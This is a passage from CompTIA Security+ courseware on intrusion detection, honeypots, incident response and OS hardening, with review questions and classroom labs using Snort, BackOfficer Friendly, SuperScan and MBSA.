                    signatures required to effectively detect misuse. Since a separate signature is needed for
                    each type of attack, a complete database of signatures can contain several hundred
                    entries. The more signatures that each passing packet must be compared against, the
                    slower the NIDS sensor operates. If a sensor operates too slowly, it misses packets and
                    potentially misses attacks as well. Despite this challenge, signature-based intrusion
                    detection is quite popular and works well in practice when configured correctly and
                    monitored frequently.

                    Anomaly detections
                    Anomaly detection takes the opposite position from signature detection. Rather than
                    operate from signatures that define misuse or attacks on the network, anomaly detection
                    creates a model of normal use and looks for activity that does not conform to that
                    model. The difficulty in anomaly detection is in creating the model of normal network
                    activity (or use model). One method of creating the use model selects key statistics
                    about network traffic to recognize normal activity. Unfortunately, too much statistical
                    variation makes models inaccurate, and events classified as anomalies might not always
                    be malicious.
                    For example, a company’s employees might have the habit of returning to their desks
                    and checking their e-mail immediately following a monthly departmental meeting. The
                    resulting spike in activity is not normal for that time of the day or week, so the anomaly-
                    based IDS might label it as a denial-of-service attempt against the mail server.
                                                                        Intrusion detection         12–17

Another problem with anomaly-based detection is the inability to create a model on a
completely “normal” network. Anomaly detection systems must create a normal use
model by monitoring traffic on the specific network that they will defend. However, the
network might already contain malicious activity, especially if it has an Internet
connection. Any use model created from such a network would implicitly ignore such
preexisting malicious activity, viewing it as “normal.” Anomaly detection systems
aren’t as popular as signature detection systems because of high false alarm rates
created by inaccurate models of normal use.

Intrusion detection products
The following table provides a listing of some of the better-known IDS products:

 Company                          Comments

 Aladdin Knowledge Systems        eSafe family provides content security against known and unknown
 ealaddin.com                     security threats.

 Cisco Systems, Inc.              Offers Cisco Guard 5650 and Cisco Traffic Anomaly Detector 5600.
 cisco.com                        These products are aimed to deal with DDoS attacks.

 Computer Associates Intl.        eTrust intrusion detection product is part of the eTrust suite.
 ca.com

 Cylant Technology                CylantSecure product purports to protect against even unknown types
 cylant.com                       of attacks by preventing any anomalous server activity.

 Enterasys Networks Inc.          Dragon family includes network monitors, host-based IDS, and central
 enterasys.com                    console.

 Internet Security Systems Inc.   A major player in the market, provides integrated host- and network-
 iss.net                          based IDS.

 Intrusion.com Inc.               Offers SecureNet family of IDS products.
 intrusion.com

 NFR Security                     Sentivist -IDS monitors packet fragments and reassembled packets,
 nfr.com                          and provides customization capabilities.

 Snort                            The home of the well-known open source IDS, Snort.
 snort.org

 Symantec Host IDS                Symantec Host IDS provides prevention, real-time monitoring and
 www.symantec.com                 detection of security breaches.

 Sourcefire, Inc.                 Open source network intrusion detection software, including Intrusion
 sourcefire.com                   Sensor and Snort.

 TripWire Inc.                    Based on the former freeware tool, product detects breaches by
 tripwire.com                     monitoring files for unauthorized changes.
12–18 CompTIA Security+ Certification

Do it!              C-1:    Discussing active and passive detection
                     Questions and answers
                      1 One way that intrusion detection systems can be categorized is based on their
                        ability to take action when they detect suspicious activity. Passive systems do not
                        take any action to stop or prevent the activity, which could potentially be an
                        attack. True or false?

                        True

                      2 A system has been developed to classify intrusion detection systems based on how
                        they detect malicious activity. What are the major categories?
                        A      Signature detection
                        B      Anomaly detection
                        C      Abnormal detection
                        D      Intrusion penetration
                        E      All of the above

                      3 Which type of IDS can only take logging and alerting types of actions when an
                        attack is identified?
                        A      HIDS
                        B      Active system
                        C      Passive system
                        D      NIDS

                      4 What is a method of detecting intrusion in which the IDS analyze the information
                        they gather and compare it to a database of known attacks?
                        A      IDS
                        B      Host wrappers
                        C      NIDS
                        D      Signature detection

                      5 Which IDS method is operating system-dependent?
                        A      Host-based
                        B      Log-based
                        C      Network-based
                        D      Event-based
                                                        Intrusion detection   12–19

6 Which method of IDS is best suited for detecting Trojan horses such as
  BackOrifice?
  A    Host-based
  B    Anomaly-based
  C    Signature-based
  D    Network-based

7 Which method of IDS is capable of real-time detection?
  A    Host-based
  B    Log-based
  C    Network-based
  D    Event-based
12–20 CompTIA Security+ Certification


Topic D: Honeypots
                    This topic covers the following CompTIA Security+ exam objective:

                     #     Objective

                     3.4   Differentiate the following types of intrusion detection, be able to explain the concepts of each
                           type, and understand the implementation and configuration of each kind of intrusion detection
                           system
                            • Honey Pots




                    Goals of deploying honeypots
 Explanation        In the broadest sense, honeypots are security resources designed with the intent that they
                    will be probed, attacked, or compromised. They are usually programs (although one
                    hardware honeypot product, Smoke Detector, does exist) that simulate one or more
                    unsecured network services. Honeypots are designed to deceive attackers into thinking
                    that the honeypot is a normal host, often with low security, in order to bait them into
                    penetrating it. When the attacker compromises the virtual host provided by the
                    honeypot, all of their actions are logged and recorded, including all keystrokes, changes
                    to the virtual host’s configuration, and uploads of attack tools.
                    Typically, the goal of deploying honeypots is in gathering information on hacker
                    techniques, methodology, and tools. Honeypots, then, are usually deployed in two major
                    cases: first, to conduct academic or basic research into hacker methods, and second, to
                    detect attackers inside the organization’s network perimeter. Honeypots do not have any
                    capabilities to prevent intrusions; quite the opposite, they are designed to attract
                    attackers just as bees are attracted to honey. Honeypots do have value in reacting to
                    intrusions, because they make the forensic process easy for investigators. Rather than
                    wading through gigabytes of system data in order to find the evidence they need,
                    investigators are directly provided the data on the intruder’s activities by the honeypot
                    software.
                    Although still infrequently encountered in enterprises, honeypots are growing in
                    popularity as a mechanism for increasing security in networks. As can be seen in the
                    following tables, a number of commercial and open source honeypot products have
                    been created. Most organizations have little interest in deploying honeypots for the sake
                    of research, as that research really does not add value to their business operations.
                    (Research honeypots are usually deployed by universities, governments, or research
                    organizations.) When businesses deploy honeypots, the goal is usually to obtain early
                    warning that a malicious hacker has access to the network.
                                                                Intrusion detection   12–21

 Commercial honeypot               Comments

 Decoy Server                      Decoy Server provides complete operating systems for
 symantec.com                      attackers to interact with, and has good monitoring, data
                                   collection and notification capabilities.

 Specter                           An easy-to-use commercial honeypot designed to run on
 specter.com                       Windows, Specter can emulate several different operating
                                   systems, monitor every ICMP packet, TCP connection and
                                   UDP datagram, and has a variety of configuration and
                                   notification features.

 PacketDecoy                       A commercial honeypot appliance with extensive detection
 palisadesys.com                   and emulation capabilities.



 Free honeypot                     Comments

 BackOfficer                       A free Windows-based honeypot, BackOfficer is
 nfr.com/resource/backO            extremely easy to use and runs on any Windows platform;
 fficer.php                        a good beginner’s honeypot.

 Deception Toolkit                 A collection of Perl scripts and C source code that emulate
 all.net/dtk/dtk.html              a variety of listening services, DTK’s primary purpose is
                                   to deceive human attackers.

 Honeyd                            Introduced a variety of new concepts, including the ability
 www.honeyd.org                    to monitor millions of unused IPs, IP stack spoofing, and
                                   to simulate hundreds of operating systems at the same
                                   time.

 Honeynets                         Not a program, but an entire network of systems designed
 www.honeynet.org                  to be compromised.

 User Mode Linux                   An open source solution that allows you to run multiple
 user-mode-                        operating systems (and honeypots) at the same time, UML
 linux.sourceforge.net             also has honeypot functionality, including the ability to
                                   capture the attacker’s keystrokes from kernel space; UML
                                   allows you to create an entire honeynet on a single
                                   computer.



Honeypot deployment options
A honeypot can be deployed in a variety of locations in the network, depending on the
goal of the person deploying it. For research purposes, directly connecting a honeypot to
the Internet allows the owner to collect the most data, because hosts exposed to the
Internet are attacked frequently and repeatedly. However, such a deployment offers little
help in securing an organization’s network. When the goal of deploying the honeypot is
to add security to the network, the honeypot should be deployed inside the network
where it can serve to detect attackers and alert security administrators to their presence.
In this case, the honeypot should be placed where it will most likely receive the
attention of an attacker, such as on a server farm or on a DMZ.
12–22 CompTIA Security+ Certification

                    Honeypot design
                    A few general principles apply when deploying honeypots. Perhaps most importantly,
                    the honeypot must attract, and avoid tipping off, the attacker. This means that the
                    honeypot should appear to have a normal operating system installation to avoid scaring
                    off an intruder who might think the system is under surveillance. The host must also
                    have something of interest for the intruder. Honeypots are often populated with phony
                    data for the attacker to peruse in order to encourage repeat visits during which more data
                    can be gathered.
                    One needs to ensure that a honeypot does not become a staging ground for attacking
                    other hosts, either inside or outside of the firewall. Outside the firewall, the honeypot
                    could be used to attack other organizations, which has implications for liability of those
                    that deploy the honeypot. Inside the firewall, the honeypot could be used to attack real
                    servers and other network resources. However, it is unlikely that an organization would
                    allow the intruder to continue to use a honeypot on the inside for an extended period
                    (allowing him to upload and use attack tools on the honeypot). The goal for such
                    organizations would be to detect and remove the intruder immediately, by closing any
                    security gaps that allowed the intruder access to the network or by removing the
                    employee in the case of an internal attacker.

                    Honeypots, ethics, and the law
                    There has been a debate in the white-hat community whether honeypots are ethical.
                    After all, their goal is to deceive a potential intruder into thinking that the honeypot is a
                    vulnerable host, and to encourage an attack on the honeypot. To some this is not only
                    deception, but also entrapment, much like a police sting operation that induces people to
                    commit crimes which they had no previous intention of committing.
                    The verdict in the security community has been resounding: there is nothing wrong with
                    deceiving an attacker into thinking that he or she is penetrating an actual host, as
                    opposed to an intrusion detection mechanism. After all, it is the intruder that has
                    malicious intent; the organization deploying the honeypot is merely enticing the attacker
                    out into view.
                    In regard to the entrapment argument, it is important to note that the honeypot does not
                    convince one to attack it; it merely appears to be a vulnerable target. To be entrapped,
                    one must be convinced by law enforcement officials to commit the crime. Not only is
                    one not convinced by anyone in particular to attack the honeypot, the honeypot has
                    nothing to do with law enforcement. It is merely a tool used to detect intruders.
                    Honeypots are not a law enforcement tool, and it is doubtful that they could be used as
                    evidence in court.
                                                                                           Intrusion detection   12–23

Do it!                         D-1:   Working with a honeypot
                                Here’s how                             Here’s why
See the classroom setup         1 Download and install a copy of       BackOfficer Friendly lures out intruders by
instructions for location of      BackOfficer Friendly according to    emulating a Back Orifice server, and a variety of
the download file.                                                     other services such as FTP, HTTP, and SMTP.
                                  your Instructor’s directions
Students will have to work
in pairs on this activity.                                             BackOfficer Friendly is located at
                                                                       nfr.com/resource/backOfficer.php. Although this
                                                                       is a Windows program, it is sometimes
                                                                       erroneously indicated that BackOfficer Friendly
                                                                       is for the Unix platform.

                                2 In the Taskbar, right-click the
                                  BackOfficer Friendly icon and
                                  choose Details…

                                3 On the menu bar, choose              To view the Options menu.
                                  Options

                                4 What types of scans can be           BackOfficer Friendly can listen for Back
                                  performed with this utility?         Orifice, FTP, Telnet, SMTP, HTTP, POP3 and
                                                                       IMAP2.

                                5 Select Listen for Telnet

                                6 At your partner’s computer, open
                                  a command window

                                7 Enter telnet                         At the command prompt.

                                8 Enter o, followed by your            For example, enter o 192.168.1.4.
                                  partner’s computer’s IP address

                                9 At your own computer, observe        The telnet connection is detected and displayed.
                                  what happens in the BackOfficer
                                  Friendly window




                               10 In BackOfficer Friendly, choose
                                  Options

                                  Enable all scanning options except   In preparation for the next activity.
                                  Listen for ftp
12–24 CompTIA Security+ Certification

Do it!                         D-2:   Working with SuperScan 3.0
                                Here’s how                             Here’s why
See the classroom setup         1 Download and install SuperScan 4     SuperScan 4 is a connect-based TCP port
instructions for location of      according to your Instructor’s       scanner, pinger, and hostname resolver. It
the download file.                                                     enables you to perform ping scans and port
                                  direction
                                                                       scans using any IP address range.

                                2 With BackOfficer Friendly still      To conduct a scan on your own system.
                                  active, enter your computer’s IP
                                  address into the Hostname/IP box

                                  Click the right arrow next to your   To add the IP address as an address to be
                                  IP address                           scanned.

                                3 Click the blue arrow toward the      To start the scan. You’ll see the results being
                                  bottom of the window                 displayed in the field at the bottom of the screen.

                                4 Switch back to BackOfficer           If the window didn’t already pop up during the
                                  Friendly                             scan. The SuperScan activity displays in the
                                                                       window.




                                5 Close all open windows
                                                                                           Intrusion detection     12–25


Topic E: Incident response
              This topic covers the following CompTIA Security+ exam objective:

               #        Objective

               3.4      Differentiate the following types of intrusion detection, be able to explain the concepts of each
                        type, and understand the implementation and configuration of each kind of intrusion detection
                        system
                         • Incident Response




              Dealing with intrusions
Explanation   The ability of intrusion detection systems and honeypots to spot attacks against your
              organization’s information assets is all well and good. However, having deployed them,
              one asks: What should be done when these systems detect an intrusion? Detecting an
              intrusion is simply not enough. Even if the active monitoring capabilities of the IDS
              managed to stop the attack in progress, many questions remain. Did the attacker gain
              access to sensitive data? How did the attack penetrate the network? Can the attacker do
              it again? Should law enforcement officials be involved?
              Every IDS deployment should include two documents: a solid IDS monitoring policy
              and procedure, and an incident response plan. These documents are written to answer
              these “what now” questions:
                     • How will the IDS be monitored?
                     • Who will monitor them?
                     • How will the organization respond in the event of an alert?
                     • Who is going to fix the vulnerability?

              IDS monitoring
              It is an unpleasant fact that the IDS needs to be monitored. Early on in their deployment,
              intrusion detection systems are likely to generate a high number of false positives; and
              though these will decrease as the IDS is tuned, the alarms still need to be investigated to
              determine how to tune the IDS. Later on, when the IDS installation is mature, an IDS
              alarm is a serious event that requires a response. Some network operations centers have
              24 by 7 monitoring, but operations staffs rarely have the experience or skills to deal with
              an intrusion.
              To monitor the IDS effectively, organizations need to have well-documented
              monitoring procedures that detail actions for specific alerts. When operations personnel
              receive an IDS alert, they can refer to these procedures to determine whom to contact
              and what actions should be taken immediately, based on the type of alarm generated by
              the IDS.
12–26 CompTIA Security+ Certification

                    Information security incident response team
                    Once IDS has been monitored and the correct resources notified about an intrusion, the
                    incident handling procedure comes into play. This procedure determines the steps that
                    response personnel should follow in addressing the security breach. The steps taken
                    depend on the level of seriousness, so a classification system is needed to categorize
                    alarms. A sample alarm classification scheme might look like this:
                        • Level 3: The least threatening type of alarm, a level 3 incident would include a
                          port scan or a single unauthorized attempt to telnet to a network device.
                        • Level 2: More serious, a level 2 incident might include unsuccessful attempts to
                          obtain unauthorized access to systems. Continued level 3 attacks could also
                          constitute a reason for escalating to level 2.
                        • Level 1: The most serious types of attack, level 1 incidents could include major
                          denial-of-service attacks, successful intrusions into systems, or similar activities.
                    Each level of severity will have its own sequence of actions to follow. Typically,
                    incidents are reported to an Information Security Incident Response Team (SIRT),
                    (whose membership is defined in the incident-handling procedure document). The SIRT
                    assigns personnel who will assemble all needed resources to handle the reported
                    incident. The incident coordinator makes decisions as to the interpretation of policy,
                    standards, and procedures when applied to the incident.
                    Typical objectives for the SIRT are:
                        • Determine how the incident happened.
                        • Establish a process for avoiding further exploitations of the same vulnerability.
                        • Avoid escalation and further incidents.
                        • Assess the impact and damage of the incident.
                        • Recover from the incident.
                        • Update procedures as needed.
                        • Determine who was responsible (if appropriate and possible).
                        • Involve legal counsel and law enforcement officials, as deemed appropriate by
                          the organization and the seriousness of the intrusion.
                    Depending on the seriousness of the attack, it is possible that only a subset of the above
                    actions would need to be addressed.
                                                                        Intrusion detection   12–27

Do it!   E-1:   Discussing incident response
          Questions and answers
          1 SIRT stands for:
            A    Security Information Response Team
            B    System Information Response Team
            C    Security Incident Response Team
            D    None of the above

          2 What are some valuable steps in handling incidents?
            A    Determine how the incident happened.
            B    Establish a process for avoiding further exploitations of the same
                 vulnerability.
            C    Avoid escalation and further incidents.
            D    Assess the impact and damage of the incident.
            E    Recover from the incident.
            F    Update procedures as needed.
            G    Determine who was responsible (if appropriate and possible).
            H    All of the above.

          3 What information should be included in the IDS monitoring procedures?

            The procedures should indicate the appropriate response—whom to contact and what
            actions should be taken immediately—based on the type of alarm generated by the IDS.
12–28 CompTIA Security+ Certification


Unit summary: Intrusion detection
Topic A             In this topic, you learned about intrusion detection systems and characteristics of
                    intrusion detection products. You learned that intrusion detection provides monitoring
                    of network resources to detect intrusions and attacks that were not stopped by the
                    preventative techniques.
Topic B             In this topic, you learned about network-based and host-based intrusion detection
                    systems and how these products are deployed for maximum effect. You learned that,
                    although both technologies have their own strengths and weaknesses, they offer
                    complimentary capabilities to each other and to firewalls and can significantly add to
                    network security when properly tuned and vigilantly monitored.
Topic C             In this topic, you learned about passive and active IDS. You learned that active IDS can
                    stop or prevent an attack by blocking offending traffic at the router or firewall, while
                    passive IDS simply logs the attack and alerts administers. You also learned about the
                    differences between anomaly-based and signature-based IDS.
Topic D             In this topic, you learned about honeypots. You learned that while honeypots are still
                    not commonly deployed in business networks, they are gaining popularity and have the
                    capability of adding to network security by gathering information about intruders and
                    their methods of gaining entry into the network.
Topic E             In this topic, you learned about IDS monitoring and incident response. You discussed
                    the importance of having well-documented procedures and a well-trained response team
                    in place before an incident occurs.

                    Review questions
                     1 What is the defense in depth security strategy?
                        A multi-layered security approach that uses multiple techniques such as preventative
                        technologies, security monitoring, and attack response to provide a robust security architecture.

                     2 Specify if each of the following are true or false positives or negatives.
                        Occur when the IDS correctly identifies undesirable traffic.
                        True positive

                        Occur when the IDS correctly identifies normal traffic.
                        True negative

                        Occur when the IDS incorrectly identifies normal traffic as an attack.
                        False positive

                        Occur when the IDS incorrectly identifies an attack as normal traffic.
                        False negative

                     3 False negatives imply that the IDS failed to detect an attack. True or false?
                        True

                     4 False positives happen when the IDS mistakenly reports certain benign activity as
                       malicious. True or false?
                        True
                                                                      Intrusion detection    12–29

 5 What is the difference between host-based and network-based intrusion detection
   systems?
   Network-based IDS (NIDS) monitor network traffic while host-based IDS (HIDS) monitor activity
   on a particular host machine.

 6 NIDS typically use two NICs. What is each used for?
   One operates in promiscuous mode to sniff passing traffic and the other is an administrative NIC
   that is used to send data such as alerts to a centralized management system.

 7 Where are the typical locations for IDS sensors?
   Just inside the firewall, on the DMZ, or on any subnets containing mission-critical servers.

 8 What are the typical reaction types for network IDS reactions?
   TCP resets, IP session logging, and shunning or blocking.

 9 HIDS audit log files, monitor file checksums, evaluate requests by application for
   system resources, and monitor system processes for suspicious activities. True or
   false?
   True

10 HIDS can only detect intrusions after the fact rather than proactively protecting the
   host. True or false?
   False

11 What are the two main types of host-based IDS?
   Host wrappers and agent-based software

12 Compare passive and active IDS.
   Passive systems log security events, alert administrators when an attack occurs, and record the
   offending traffic for analysis, but do not take any preventive action to stop the attack. Active
   systems have all the logging, alerting, and recording features of passive IDS, with the additional
   ability to take action against the offending traffic.

13 Compare signature-based and anomaly-based IDS.
   Signature detection is achieved by creating models of attacks, also called signatures. As events
   are monitored, they are compared to a model to determine whether the event qualifies as an
   intrusion. Anomaly detection takes the opposite position from signature detection. Rather than
   operate from signatures that define misuse or attacks on the network, anomaly detection creates
   a model of normal use and looks for activity that does not conform to that model.

14 What is typically the goal of deploying honeypots?
   To gather information on hacker techniques, methodology, and tools.

15 Which of the following is true when deploying honeypots?
   A   Honeypots must attract the attacker without tipping them off.
   B Honeypots should never use the normal operating system.
   C Only real data is of interest to attackers so phony data should never be used.
   D Honeypots should only be placed outside the firewall.
12–30 CompTIA Security+ Certification

                    16 Every IDS deployment should include documents describing the monitoring policy
                       and procedure, and an incident response plan. True or false?
                        True

                    17 Early on in their deployment, intrusion detection systems are likely to generate a
                       high number of false negatives. True or false?
                        False. When first set up, they are likely to generate false positives.

                    18 A well-documented monitoring procedure specifies whom operations personnel
                       should contact. Information about what to do about the intrusion is not included in
                       this document. True or false?
                        False. The document does include this information.

                    19 Deployment of a honeypot is seen by some as entrapment and, according to them, is
                       therefore unethical. True or false?
                        True

                    20 Honeypots cannot be used to attack legitimate systems. True or false?
                        False. If you do not carefully structure the honeypot environment, attackers can launch attacks
                        against your network or other networks from this environment.


                    Independent practice activities

                    Installing Snort on Windows-based systems
                    Snort is an example of an IDS solution. After completing this activity, you’ll know how
                    to install Snort for Windows.
                    Note: The servers used in this activity will be referred to as Server-X and Server-Y.
                    Please substitute the names of your servers for these names.
                     1 Log on to Server-X as Administrator. (If necessary)
                     2 Verify that WinPcap is installed on the server. (If it isn’t, download
                       WinPcap_3_1.exe according to your Instructor’s direction. Double-click the
                       WinPcap_3_1.exe file, click Next three times, click OK and reboot Server-X and
                       log on as Administrator.)
                     3 Create a folder called snort on C:\ (your local hard drive).
                     4 Download snort_243_Installer.exe from www.snort.org/dl/binaries/win32 to the
                       snort folder.
                     5 Double-click the snort_243_Installer.exe file to start the installation. Accept all
                       defaults and choose C:\snort as the destination folder.
                     6 Rename the snort.conf file in C:\snort\etc to snort.old.
                     7 Open snort.old with Wordpad (not Notepad).
                     8 Save the snort.old file as snort.conf in a text format.
                     9 Close Wordpad.
                    10 Rename the snort.conf.txt file to snort.conf.
                    11 Click Yes to accept the format change.
                    12 Repeat steps 1-11 above on Server-Y.
                                                             Intrusion detection   12–31

Capturing packets with Snort
After completing this activity, you’ll be able to understand how to use Snort to capture
data packets, view the contents of the data packets, and create log files.
Note: The servers used in this activity will be referred to as Server-X and Server-Y.
Please substitute the names of your servers for these names.
 1 On Server-X, click Start, Run, and type cmd.
 2 Click OK.
 3 Type cd \snort\bin and press Enter.
 4 Enter snort –W. You’ll see a list of the available interfaces, each with a number
   assigned to it (1, 2, and so on).
 5 Type snort –v –i followed by the number of the interface you want to listen to. For
   example, you might type snort –v –i 2 to listen to interface 2.
 6 Press Enter. You’ll see a screen similar to the one shown in Exhibit 12-4 below.




Exhibit 12-4: The snort interface initialization screen

 7 On Server-Y, click Start, Run, and type cmd.
 8 Click OK.
 9 Type ping Server-X and press Enter.
10 On Server-X, view the results, as shown in Exhibit 12-5. Notice the ECHO and
   ECHO REPLY.
12–32 CompTIA Security+ Certification




                    Exhibit 12-5: A Snort ping capture

                    11 On Server-X, press Ctrl+C to view the statistics, as shown in Exhibit 12-6. Notice
                       that the protocols used were ICMP and ARP.




                    Exhibit 12-6: Snort ping capture statistics

                    12 On Server-X, at the command line enter snort –v –d –i followed by the interface
                       number to view the packet data.
                    13 On Server-Y, enter ping Server-X.
                    14 On Server-X, view the results. You’ll see a screen similar to the one shown in
                       Exhibit 12-7.
                                                                Intrusion detection   12–33




Exhibit 12-7: A Snort ping capture with data

15 On Server-X, press Ctrl+C.
16 On Server-X, enter snort –dev –l \snort\log –K ascii –i followed by the interface
   number to log results to a log file.
17 Ping Server-X from Server-Y.
18 On Server-X, press Ctrl+C.
19 Navigate to the C:\snort\log folder and examine the contents. Use Notepad to open
   the files in the subfolder(s).
20 Repeat Steps 1 through 20 above in Server-Y.
21 Close all Windows.

Creating a Snort rule set
In this activity, you’ll create a simple Snort rule to alert you when the ICMP protocol is
used. After completing this activity, you’ll be able to create a Snort rule set, and test the
rules set on the network.
Note: The servers used in this activity will be referred to as Server-X and Server-Y.
Please substitute the names of your servers for these names.
 1 Log on to Server-X as Administrator. (If necessary.)
 2 Click Start, Run…, and type notepad.
 3 Click OK.
 4 Enter the information shown in Exhibit 12-8.
12–34 CompTIA Security+ Certification




                    Exhibit 12-8: A Snort rule set

                     5 Save the file as c:\snort\new.rules. Close Notepad.
                     6 Rename c:\snort\new.rules.txt to c:\snort\new.rules. Accept the format change
                       when prompted.
                     7 On Server-X, open a Command window.
                     8 At the command line, enter cd \snort\bin.
                     9 At the command line, enter snort –c \snort\new.rules –K ascii –l \snort\log –i
                       followed by the interface number.
                    10 From Server-Y, open Internet Explorer and enter http://Server-X’s IP address in
                       the address box. Press Enter.
                    11 On Server-X, press Ctrl+C.
                    12 Navigate to the C:\snort\log folder.
                    13 In Server-Y’s subfolder, examine the Web Traffic Logged in the TCP_*-80.ids
                       files. It should look similar to Exhibit 12-9.




                    Exhibit 12-9: A Snort log file containing Web traffic
                                                             Intrusion detection   12–35

14 On Server-X, change to the c:\snort\bin directory and then enter snort –c
   \snort\new.rules –K ascii –l \snort\log –i followed by the interface number.
15 On Server-Y, ping Server-X.
16 On Server-X, press Ctrl+C.
17 Navigate to the C:\snort\log folder.
18 Examine the contents of the alert.ids file. It should look similar to the one shown in
   Exhibit 12-10.




Exhibit 12-10: A Snort ICMP traffic alert log

19 Repeat steps 1-18 above on Server-Y.
20 Close all Windows and log off Server-X and Server-Y.
                                                              13–1


Unit 13
Security baselines
                     Unit time: 180 minutes

                     Complete this unit, and you’ll know how to:

                     A Gain an understanding of OS/NOS
                        vulnerabilities and hardening practices.

                     B Explore common network hardening
                        practices, including firmware updates,
                        access control lists, and configuration best
                        practices.

                     C Harden application-layer services—such as
                        Web, e-mail, FTP, DNS, file/print, DHCP,
                        and database repositories—against attacks.

                     D Explain how to properly configure
                        workstations and servers and implement
                        personal firewall software and antivirus
                        packages.
13–2      CompTIA Security+ Certification


Topic A: OS/NOS hardening
                     This topic covers the following CompTIA Security+ exam objectives:

                      #      Objective

                      1.3    Non-essential Services and Protocols – Disabling unnecessary systems / process / programs.

                      3.5    Understand the following concepts of Security Baselines, be able to explain what a Security
                             Baseline is, and understand the implementation and configuration of each kind of intrusion
                             detection system
                              • OS / NOS (Operating System / Network Operating System) Hardening
                                  • File System
                                  • Updates (Hotfixes, Service Packs, Patches)




                     Securing the operating system
Explanation          Operating system/network operating system (OS/NOS) hardening is the process of
                     modifying an operating system’s default configuration to make it more secure from
                     outside threats. This process might include removing unnecessary programs and
                     services, setting access privileges, and applying patches to the system kernel to limit
                     vulnerability.
                     The OS can essentially be considered the brain of a typical computer system. Operating
                     systems not only establish communication between the hardware and the software
                     running on it, but also manage and facilitate the distribution of system resources across
                     different tasks (as shown in Exhibit 13-1).




                     Exhibit 13-1: OS/NOS hardening
                                                              Security baselines    13–3

It’s extremely important, therefore, for system administrators to protect the integrity and
availability of operating systems from outside threats. Actions that could disrupt the
functionality of a system can be categorized as follows:
    • Attacks—These are intentional acts by malicious individuals either to gain
      unauthorized access to user data and system resources or to compromise other
      targets.
    • Malfunctions—These are hardware or software failures that may prevent a
      system from performing its tasks.
    • Errors—These are unintentional acts, by external or internal users, that may
      adversely affect the functionality of a system.

Best practices
Although it’s almost impossible to achieve complete security of a system when it’s
deployed as part of a network, IT managers can follow certain guidelines to safeguard
the system from intruders. Following is a common list of best practices for operating
system hardening:
    • Identify and remove unused applications and services, which, if compromised,
      can reveal sensitive information about a system. Remove unused or unnecessary
      file shares.
    • Implement and enforce strong password policies. Force periodic password
      changes. Remove or disable all expired or unneeded accounts.
    • Limit the number of administrator accounts available. Set necessary privileges to
      ensure that resources are accessible on an as-needed basis.
    • Set account lockout policies to discourage password cracking.
    • Keep track of the latest security updates and hot fixes. Apply vendor-suggested
      upgrades and patches as they are made available.
    • Back up the system on a periodic basis for restoration in case of emergency.
    • Log all user account and administrative activity so you can conduct forensic
      analysis if the system is compromised.

Documentation
Keeping an external log of each critical system can increase system integrity and make
future security-related maintenance much simpler. This hard log should include a list of
all software and version numbers that are installed on the system. As users, groups, and
access privileges are defined, and other critical decisions are made during the baselining
process, they should be recorded in this document. Records of all backups and upgrades
should also be maintained in this single reference. When a security patch is
recommended for a certain combination of operating system and applications, you
won’t need to dig around in your active system to see if it applies; simply refer to the
paper logs. A recommended method is to use a composition book for each critical
system. It’s obvious when pages are removed (they never should be), and it’s easy to
take with you to analyze.
13–4           CompTIA Security+ Certification

Do it!                         A-1:   Using the Microsoft Baseline Security Analyzer
                                Here’s how                         Here’s why
                                1 Log on to your server as         Microsoft Baseline Security Analyzer (MBSA)
                                  Administrator                    can scan local and remote machines for security
                                                                   issues with Microsoft Windows NT 4, Windows
                                                                   2000, Windows Server 2003, Windows XP, IIS,
                                                                   SQL Server, Internet Explorer, and Office.
                                                                   Reports are generated with details after the scan
                                                                   is complete. In this activity, you’ll install MBSA
                                                                   and view the results.

See the classroom setup         2 Download mbsasetup-en.msi        To download this file from Microsoft’s web site,
instructions for location of      according to your Instructor’s   go to www.microsoft.com/downloads.
the download file.                                                 Search using the keyword mbsa.
                                  directions

                                3 Double-click the mbsasetup-
                                  en.msi file

                                  Click Next                       To start the MBSA Setup wizard.

                                4 Select I accept the license
                                  agreement

                                  Click Next

                                5 Click Next                       To use the default folder.

                                6 Click Install

                                7 Click OK                         To acknowledge that the installation has
                                                                   finished.

                                8 Click Start, then choose All     To start the program.
                                  Programs, Microsoft
                                  Baseline Security Analyzer
                                  2.0
                                                        Security baselines     13–5

 9 Click Scan a computer

   Maximize the window                If necessary.




10 Click Start scan                   (In the lower-left corner of the window.)
                                      Security update information downloads from the
                                      Internet and the scan begins. Note that this
                                      process may take some time to complete.

11 After the scan is complete, view   The report shows what was scanned, the results
   the report                         of the scan, and how to fix any problems.

12 Close all windows
13–6     CompTIA Security+ Certification

Do it!              A-2:      Discussing system hardening
                      Questions and answers
                       1 Which of the following should be included in a list of system hardening best
                         practices? (Choose all that apply.)
                          A    Deny data access to all users but a select few.
                          B    Identify and remove unused applications and services.
                          C    Implement and enforce strong password policies.
                          D    Limit the number of administrator accounts.

                       2 Which of the following are not actions that could disrupt the functionality of a
                         system?
                          A    Attacks
                          B    Malfunctions
                          C    Errors
                          D    Data errors

                       3 Which of the following three statements about OS/NOS hardening is not true?
                          A    OS/NOS hardening includes removal of unnecessary programs.
                          B    OS/NOS hardening includes application hardening.
                          C    OS/NOS hardening includes applying or adding patches to the system kernel.
                                                                               Security baselines    13–7

              File systems
Explanation   File systems store data necessary to enable communication between an application and
              its supporting disk drives. File systems require special attention when you’re securing
              the OS. Strong file-system security can not only stop inside file tampering but also stop
              hackers who have gained access to the system but not the files.

              Access privileges
              Operating systems provide the capability to set access privileges for files, directories,
              devices, and other data or code objects. Setting privileges and access controls protects
              information stored on the computer. Common privileges that can be set on files and
              directories are Read, Write, and Execute privileges.
                  • Denying Read access protects confidentiality of information.
                  • Denying Write access protects the integrity of information from unauthorized
                    modification.
                  • Restricting execution privileges of most system-related tools to system
                    administrators can prevent users and attackers from making intentional or
                    unintentional configuration changes that could damage security.
              The principle of least privilege states that users should have the minimum amount of
              access needed to perform their jobs. Although it may be easier to give all employees
              access to a file repository so that they can easily share a file as it’s being modified, this
              practice opens up many possibilities for a breach of security.
              It might also be necessary to distinguish local access privileges from network access
              privileges. Application programs may request and be granted increased access
              privileges for some of their automated operations. On the other hand, a system
              administrator may want to limit users’ privileges based on their required scope. This can
              be done in a number of ways, as outlined in the following sections.

              Setting user and group privileges
              To assist in privilege assignment, the administrator should determine user groups and
              object groups, and identify required access for each object (file, directory, device) by
              each user group within the system.
              When setting privileges for users, you can usually simplify both the initial task and
              future updates by grouping users by common needs. Most operating systems allow
              rights to be granted to a group, which then propagates those privileges to all members of
              the group.
              For instance, all corporate accountants may have access to a folder of resources,
              accounting software, and several printers in a section of the building. Rights to each of
              those resources could be granted to the accounting group, and all accountants could be
              added to that group. If a new, generally available accounting resource is added, an
              administrator need only add it to the accounting group for all accountants to have
